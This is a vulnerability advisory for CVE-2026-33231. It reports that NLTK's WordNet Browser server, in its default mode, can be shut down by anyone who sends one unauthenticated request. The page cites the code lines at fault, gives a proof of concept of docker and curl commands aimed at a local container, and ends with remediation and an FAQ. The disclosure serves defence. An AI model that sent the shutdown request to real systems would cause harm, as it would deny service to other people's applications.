CVE-2026-33231: NLTK has unauthenticated remote shutdown in nltk.app.wordnet_app
Summary nltk.app.wordnetapp allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple GET /SHUTDOWN%20THE%20SERVER request causes the process to terminate immediately via os.exit(0), resulting in a denial of service.
Details The vulnerable logic is in nltk/app/wordnetapp.py:
- nltk/app/wordnetapp.py:242 - The server listens on all interfaces: - server = HTTPServer(("", port), MyServerHandler)
- nltk/app/wordnetapp.py:87 - Incoming requests are checked for the exact path: - if unquoteplus(sp) == "SHUTDOWN THE SERVER":
- nltk/app/wordnetapp.py:88 - The shutdown protection only depends on servermode
- nltk/app/wordnetapp.py:93 - In the default mode (runBrowser=True, therefore servermode=False), the handler terminates the process directly: - os.exit(0)
This means any party that can reach the listening port can stop the service with a single unauthenticated GET request when the browser is started in its normal mode.
PoC 1. Start the WordNet Browser in Docker in its default mode:
bash docker run -d --name nltk-wordnet-web-default-retest -p 8004:8004 \ nltk-sandbox \ python -c "import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnetapp import wnb; wnb(8004, True)"
2. Confirm the service is reachable:
bash curl -s -o /tmp/wnbefore.html -w '%{httpcode}\n' 'http://127.0.0.1:8004/'
Observed result:
text 200
3. Trigger shutdown:
bash curl -s -o /tmp/wnshutdown.html -w '%{httpcode}\n' 'http://127.0.0.1:8004/SHUTDOWN%20THE%20SERVER'
Observed result:
text 000
4. Verify the service is no longer available:
bash curl -s -o /tmp/wnafter.html -w '%{httpcode}\n' 'http://127.0.0.1:8004/' docker ps -a --filter name=nltk-wordnet-web-default-retest --format '{{.Names}}\t{{.Status}}' docker logs nltk-wordnet-web-default-retest
Observed results:
text 000 nltk-wordnet-web-default-retest Exited (0) Server shutting down!
Impact This is an unauthenticated denial-of-service issue in the NLTK WordNet Browser HTTP server.
Any reachable client can terminate the service remotely when the application is started in its default mode. The impact is limited to service availability, but it is still security-relevant because:
- the route is accessible over HTTP - no authentication or CSRF-style confirmation is required - the server listens on all interfaces by default - the process exits immediately instead of performing a controlled shutdown
This primarily affects users who run nltk.app.wordnetapp and expose or otherwise allow access to its listening port.
Other sources
NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, nltk.app.wordnetapp allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple GET /SHUTDOWN%20THE%20SERVER request causes the process to terminate immediately via os.exit(0), resulting in a denial of service. Commit bbaae83db86a0f49e00f5b0db44a7254c268de9b patches the issue.
— NVD
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
nltk.app.wordnet_appto a version that resolves this vulnerability.Patch bbaae83db86a0f49e00f5b0db44a7254c268de9b
Event History
Frequently Asked Questions
What is the severity of CVE-2026-33231?
The severity of CVE-2026-33231 is considered to be high due to its potential to cause a denial of service.
How do I fix CVE-2026-33231?
To fix CVE-2026-33231, avoid using nltk.app.wordnet_app in its default mode or upgrade to a version of nltk that addresses this vulnerability.
What software is affected by CVE-2026-33231?
CVE-2026-33231 affects nltk versions up to and including 3.9.3.
What kind of attack is CVE-2026-33231 associated with?
CVE-2026-33231 is associated with an unauthenticated remote shutdown attack on the local WordNet Browser HTTP server.
What happens if my system is affected by CVE-2026-33231?
If your system is affected by CVE-2026-33231, an attacker can remotely terminate the WordNet Browser HTTP server, leading to service disruption.